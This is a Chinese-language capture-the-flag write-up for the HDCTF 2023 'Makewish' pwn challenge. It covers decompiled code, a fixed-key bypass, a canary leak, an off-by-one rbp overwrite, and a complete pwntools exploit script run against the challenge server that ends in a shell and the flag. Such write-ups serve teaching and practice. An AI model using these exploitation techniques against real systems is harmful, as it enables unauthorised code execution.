[HDCTF 2023]Makewish bugmaker

[HDCTF 2023]Makewish bugmaker的WriteUp

解题过程

信息搜集

checksec pwn
​

[*] '/home/kali/Desktop/ctf/pwn'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No
​

分析

• Linux64位小端序
• Canary

查看源码

int __fastcall main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+8h] [rbp-38h] BYREF
  int v5; // [rsp+Ch] [rbp-34h]
  char buf[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+38h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  init(argc, argv, envp);
  v5 = rand() % 1000 + 324;
  puts("tell me you name\n");
  read(0, buf, 0x30uLL);
  puts("hello,");
  puts(buf);
  puts("tell me key\n");
  read(0, &v4, 4uLL);
  if ( v5 == v4 )
    return vuln();
  puts("failed");
  return 0;
}
​
            
AI代码解释
            
                
            
        

int init()
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  return setvbuf(stderr, 0LL, 2, 0LL);
}
​

__int64 vuln()
{
  _BYTE buf[88]; // [rsp+0h] [rbp-60h] BYREF
  unsigned __int64 v2; // [rsp+58h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("welcome to HDctf,You can make a wish to me");
  buf[(int)read(0, buf, 0x60uLL)] = 0;
  puts("sorry,i can't do that");
  return 0LL;
}
​
            
AI代码解释
            
                
            
        

分析

• 它的key为v5 = rand() % 1000 + 324是一个伪随机数，在init中并没有初始化种子，所以v5会是定值，可以用ida动态调试得到v5 == 0x2C3 == 707
• main和vuln分别存在一个read
• 我们可以先用main中的read泄露出canary，然后用vuln中的read跳转到backdoor
• 之所以要泄露canary是因为我们要填满vuln中buf的0x60 == 96个字节让buf[96] = rbp = 0
• 可以理解为当rbp被修改成0后，它后门的返回地址就会在buf中乱跳，我们只要在buf中填满backdoor的地址就有机会让它的返回地址跳到backdoor，比如构造payload = p64(backdoor) * 11 + p64(canary)

数据搜集

.text:00000000004007C7                 public treasure
.text:00000000004007C7 treasure        proc near
.text:00000000004007C7 ; __unwind {
.text:00000000004007C7                 push    rbp
.text:00000000004007C8                 mov     rbp, rsp
.text:00000000004007CB                 mov     edi, offset command ; "/bin/sh"
.text:00000000004007D0                 call    _system
.text:00000000004007D5                 nop
.text:00000000004007D6                 pop     rbp
.text:00000000004007D7                 retn
.text:00000000004007D7 ; } // starts at 4007C7
.text:00000000004007D7 treasure        endp
​
            
AI代码解释
            
                
            
        

分析

• 这里我们取.text:00000000004007CB mov edi, offset command ; "/bin/sh"为起点

最终脚本

from pwn import *

# 连接
r = remote("node4.anna.nssctf.cn", 22064)

# 构造泄露 canary 的 payload
payload = cyclic(40)
payload += '|'.encode()
r.sendafter("tell me you name\n\n".encode(), payload)

# 获取 canary
r.recvuntil('|'.encode())
canary = u64('\x00'.encode() + r.recv(7))

# 绕过 v5 == v4
key = 0x2C3
payload = struct.pack("<i", key)
r.sendafter("tell me key\n\n".encode(), payload)

# 搜集到的 backdoor 地址
backdoor_elf_addr = 0x4007CB

# 构造发送跳转 backdoor 的 payload
payload = p64(backdoor_elf_addr) * 11
payload += p64(canary)
r.sendafter("welcome to HDctf,You can make a wish to me\n".encode(), payload)

# 交互
r.interactive()
r.close()
​
            
AI代码解释
            
                
            
        

D:\Environment\python\python-3.13.0-amd64\python.exe D:\Work\test\testPython\src\com\probie\test01\Main.py 
[x] Opening connection to node4.anna.nssctf.cn on port 22064
[x] Opening connection to node4.anna.nssctf.cn on port 22064: Trying 1.14.71.254
[+] Opening connection to node4.anna.nssctf.cn on port 22064: Done
[*] Switching to interactive mode
sorry,i can't do that
ls
bin
cs5
dev
flag
lib
lib32
lib64
cat flag
NSSCTF{5e0c6639-cabc-49dd-9bd3-e6b33ba61cb8}
​
            
AI代码解释
            
                
            
        

得到：NSSCTF{5e0c6639-cabc-49dd-9bd3-e6b33ba61cb8}